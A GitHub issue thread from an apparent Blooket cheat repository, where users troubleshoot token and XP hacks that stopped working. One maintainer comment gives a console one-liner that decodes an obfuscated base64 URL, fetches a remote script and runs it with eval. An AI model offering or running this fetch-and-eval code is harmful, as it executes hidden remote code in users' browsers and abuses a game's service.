### ISSUE TITLE
can't get tokens/exp anymore

### ISSUE THREAD

**Issue by PhazeKid048** [glixzzy/blooket-hack#573]

**Comment by BlooketHackerLoL** [comment]
SAAAAME

**Comment by BlooketHackerLoL** [comment]
the hacks just aren't working anymore

**Comment by BbyfoxY** [comment]
They still work wdym?

**Comment by BbyfoxY** [comment]
are you using the console and copy/pasting from the readme?

**Comment by BbyfoxY** [comment]
CLOSE THIS ISSUE!

**Comment by 3kh0** [comment]
**Hello there!**

Your issue is not complete and we can not tell the problem!<br>

Here are some questions you should answer when creating an issue:
- What browser do you use? 
- Are you on a school computer and/or connected to the school internet?
- Are you using a bookmarklet or are you pasting the code into the console?
- Has the code worked before?
- Is it the original code? This is what the original code would look like: `fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vc2Nob29sLWNoZWF0cy9yYXcvdXBsb2FkL3YxNjM3NDUyMjEzL2dsb2JhbFNwYW1PcGVuQm94ZXMuanM=')).then((res) => res.text().then((t) => eval(t)))`

Thank you for letting us know the issue! 😀

**Comment by PhazeKid048** [comment]
if I use JavaScript and type it exactly right, it'll say i got it, but when I refresh the page, i'll still have the same amount as before

**Comment by 3kh0** [comment]
> if I use JavaScript and type it exactly right, it'll say i got it, but when I refresh the page, i'll still have the same amount as before I use chrome, I use mostly school internet, i'm pasting the code, and the code has worked before

Ok, remember that you can only add up to 500 tokens every day. Make sure you refresh the page to see it change. If that does not work then please let us know!

- Echo

**Comment by varedz** [comment]
Fixed.
